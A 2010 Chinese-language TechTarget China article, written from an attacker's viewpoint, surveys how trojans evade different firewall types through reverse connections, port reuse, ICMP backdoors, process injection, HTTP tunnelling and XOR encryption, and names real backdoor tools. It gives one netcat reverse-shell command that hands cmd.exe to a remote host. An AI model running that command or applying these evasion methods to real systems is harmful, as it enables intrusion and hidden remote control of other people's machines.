木马如何穿过防火墙?

日期: 2010-06-20 来源:TechTarget中国

  网络不太平,谁上网都会架起个firewall来防护网络攻击,这岂不是给我们木马的生存带来了巨大挑战?

  物竞天择,适者生存,要想生存下去就要穿墙!Bypass Firewall:

  1. 首先就是No Firewall(允许本地对外监听基本上任何端口),没有防火墙?

  对付这种机器好办,随便哪个马一般都有典型代表Radmin(其实它不是木马,用的人多了,也就变成了马)

  rdp 3389/tcp(远程桌面,它也不是马,不过你不用,还有谁用呢?)

  2. 端口筛选(只允许外部连接特定端口,也就是外部对特定端口发起syn连接请求才被接受,从而完成三次握手,建立连接,否则防火墙丢弃数据包,无法完成握手,无法建立连接,也就是木马不能随意开个端口就监听了)

  道高一尺,魔高一丈:

  你不让我连你,我就让你连我, 反弹端口技术诞生了(一般防火墙对本地发起的syn连接请求不会拦截)

  使用工具netcat就可以穿刺这种防火墙:

  nc-e cmd.exe 远程ip 远程监听port

  随后,端口复用技术也出现了,复用防火墙开放的端口:如80、21、445等

  典型的后门如hkdoor、ntrookit。

  还有利用无端口协议来通信,如利用icmp报文,(Ping就是利用的ICMP协议的 Echo Request和Echo Reply探测主机存活)

  典型的如pingdoor(Ping由于使用icmp报文,根本不开放端口,端口筛选也就无可奈何了,但是icmp并无差错控制,所以这种后门的传输特性也并不理想,除非自己加上差错控制)

  更牛的,就是干脆抛开TCP/IP协议,木马自定义协议进行通信,你防火墙能把我怎么样?

  典型的如ntrootkit采用了自定义协议技术。

  3.应用程序筛选(只允许特定程序访问网络)

  木马也不甘落后,自己不能访问网络,只好寄人篱下:

  进程插入技术诞生了,通常firewall都要允许iexplore.exe、explore.exe、svchost.exe、services.exe等程序访问网络,于是木马便盯上了这些程序。插入……插入再插入。

  现在的远程控制一般都是插入进程式,一是隐蔽(没有自己进程),二是穿墙.典型如Bits.dll(替换系统服务BITS,插入svchost.exe中)和灰鸽子/PcShare(默认插入iexplorer.exe浏览器进程)等。

  4.协议筛选

  (例如,只允许80端口通过http协议,这样那些端口复用的后门没有使用http协议,不幸被防火墙拒之门外。)

  怎么办?暗渡陈仓,挖隧道: http-tunnel(http隧道)将木马通信封装成http数据报进行传输。

  使用这种技术的有pcshare(使用双向http隧道传输)。

  5.IP过滤,一般就是化分为本机、局域网、广域网三个层次,不过木马也不是吃素的,有些木马已经开始智能化了:

  比如,无法连到黑客主机或者跳板,就搜索本机的代理设置,如IE代理设置,然后代理出去!

  可以想象P2P形式的马也将于不久以后成为可能,这样木马和僵尸网络的区别就更小了。

  6. 现在很多防火墙都可以检测传输的敏感信息,如用户口令等,所以抗IDS,抗自动分析,这便成了高级木马需要考虑的东西,换句话说保护黑客控制的安全性和隐秘性。典型的解决方法就是采取加密措施,如最简单的对付IDS检测的方法,xor异或加密。

  但是现在的防护墙肯定不是以上技术的分离,而是一定有多项技术同时采用。

  同时,综合利用以上对抗技术的木马也不鲜见了。

我们一直都在努力坚持原创.......请不要一声不吭,就悄悄拿走。

我原创,你原创,我们的内容世界才会更加精彩!

【所有原创内容版权均属TechTarget,欢迎大家转发分享。但未经授权,严禁任何媒体(平面媒体、网络媒体、自媒体等)以及微信公众号复制、转载、摘编或以其他方式进行使用。】

微信公众号

TechTarget微信公众号二维码

TechTarget

官方微博

TechTarget中国官方微博二维码

TechTarget中国

电子邮件地址不会被公开。 必填项已用*标注

敬请读者发表评论,本站保留删除与本文无关和不雅评论的权力。

相关推荐

  • NSS实验室评估下一代防火墙

    根据NSS实验室对下一代防火墙的评估发现,来自七家供应商的产品可有效保护企业免受恶意流量的侵害,而且总体拥有成 […]

  • 都是套路:Pokémon GO被网络攻击者盯上了

    尽管尚未登陆中国,移动游戏Pokémon GO仍旧占据了各大科技媒体的推送头条,在游戏发布的短短一周内该款游戏已获得了超百万次的安装量。与狂热的用户群同在的是,网络攻击者也盯上了游戏玩家……

  • 为什么单靠网络外围安全行不通?

    近20年来,大多数企业对网络安全采取了古老的“吊桥和护城河”的方法,即把所有企业流量汇集到网关,同时通过防火墙阻止所有不良流量。现在这种方法怎么会可行…

  • “外围”消亡 企业安全防护需要新形态

    外围不复存在,所以我们如何期望防火墙保护员工呢?防火墙如何保护移动设备上的应用呢?因此,企业既要利用网络级的保护,更要重视利用应用级的保护。